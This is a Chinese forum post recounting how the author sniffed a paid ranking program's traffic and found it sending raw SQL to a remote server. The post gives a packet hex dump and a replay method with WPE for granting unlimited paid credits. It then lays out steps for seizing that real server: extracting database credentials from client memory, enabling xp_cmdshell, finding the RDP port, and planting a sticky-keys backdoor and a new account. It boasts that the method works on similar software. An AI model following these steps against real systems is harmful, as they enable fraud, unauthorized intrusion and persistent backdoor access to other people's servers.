[原创]抓了一个数据包拿下一台服务器
下载了一个《网站排名某某程序》,程序需要.NET2.0 C#开发,加了Xenocode,程序卡的要死要死的。
官方网站:http://3w.paiminger..com/download/
写在前面:调试发现程序加了木马远程控制功能[请虚拟机测试]
软件盈利方式:充值积分
打开minisniffer后再打开软件,发现如下数据包
很明显,sql server连接数据包,抓取一条数据包用WPE修改一下连续发包直接刷积分。

举例数据包[刷积分增加2.4]:
31 192.168.6.130:1600 117.21.191.171:6486 320 WSA发送 0000 03 09 01 40 00 00 01 00 16 00 00 00 12 00 00 00 ...@............ 0010 02 00 00 00 00 00 00 00 00 00 01 00 00 00 FF FF ................ 0020 0A 00 02 00 00 00 E7 BC 00 04 08 D0 00 00 BC 00 ................ 0030 55 00 50 00 44 00 41 00 54 00 45 00 20 00 64 00 U.P.D.A.T.E. .d. 0040 69 00 61 00 6E 00 5F 00 75 00 73 00 65 00 72 00 i.a.n._.u.s.e.r. 0050 20 00 53 00 45 00 54 00 20 00 6A 00 69 00 66 00 .S.E.T. .j.i.f. 0060 65 00 6E 00 20 00 3D 00 20 00 6A 00 69 00 66 00 e.n. .=. .j.i.f. 0070 65 00 6E 00 2B 00 32 00 2E 00 34 00 2C 00 6A 00 e.n.+.2...4.,.j. 0080 69 00 65 00 73 00 75 00 6D 00 3D 00 6A 00 69 00 i.e.s.u.m.=.j.i. 0090 65 00 73 00 75 00 6D 00 2B 00 32 00 2E 00 34 00 e.s.u.m.+.2...4. 00A0 2C 00 7A 00 6F 00 6E 00 67 00 64 00 6A 00 3D 00 ,.z.o.n.g.d.j.=. 00B0 7A 00 6F 00 6E 00 67 00 64 00 6A 00 2B 00 32 00 z.o.n.g.d.j.+.2. 00C0 2E 00 34 00 20 00 20 00 57 00 48 00 45 00 52 00 ..4. . .W.H.E.R. 00D0 45 00 20 00 6E 00 61 00 6D 00 65 00 20 00 3D 00 E. .n.a.m.e. .=. 00E0 20 00 40 00 6E 00 61 00 6D 00 65 00 00 00 E7 22 .@.n.a.m.e...." 00F0 00 04 08 D0 00 00 22 00 40 00 6E 00 61 00 6D 00 ......".@.n.a.m. 0100 65 00 20 00 6E 00 76 00 61 00 72 00 63 00 68 00 e. .n.v.a.r.c.h. 0110 61 00 72 00 28 00 38 00 29 00 05 40 00 6E 00 61 a.r.(.8.)..@.n.a 0120 00 6D 00 65 00 00 E7 10 00 04 08 D0 00 00 10 00 .m.e............ 0130 -- 00 -- 00 -- 00 -- 00 -- 00 -- 00 -- 00 -- 00 -.-.-.-.-.-.-.-. // your user
得出Send结构体
struct _SEND_
{
WORD wBZ; //标识位
WORD wSize; //数据包大小,正序
........
wchar_t wcsBuffer[]; //UNICODE编码 SQL语句
}
直接修改2.4为你想要的数字发送就修改了,想刷多少钱刷多少钱的积分。

//--------------------------------------------------------------------------------------
单单刷积分使用软件还不够好玩,不如直接练练手拿下服务器。
1.搜索C#怎么开发MSSQL,使用CE内存搜索到服务器、账号密码、数据库。

2.使用SQLTools连接服务器,启用xp_cmdshell功能,开启DOS命令。

[



所有备份都在这了,别乱动哦。
3.看一下服务器数据裤


4.找出3389服务真正的端口 netstat -abn>netstat.txt & type netstat.txt

5.添加shift后门,添加账号,登入服务器。
现在的软件开发人员真的太菜了。。。。。。类似的程序编写方式,通杀。
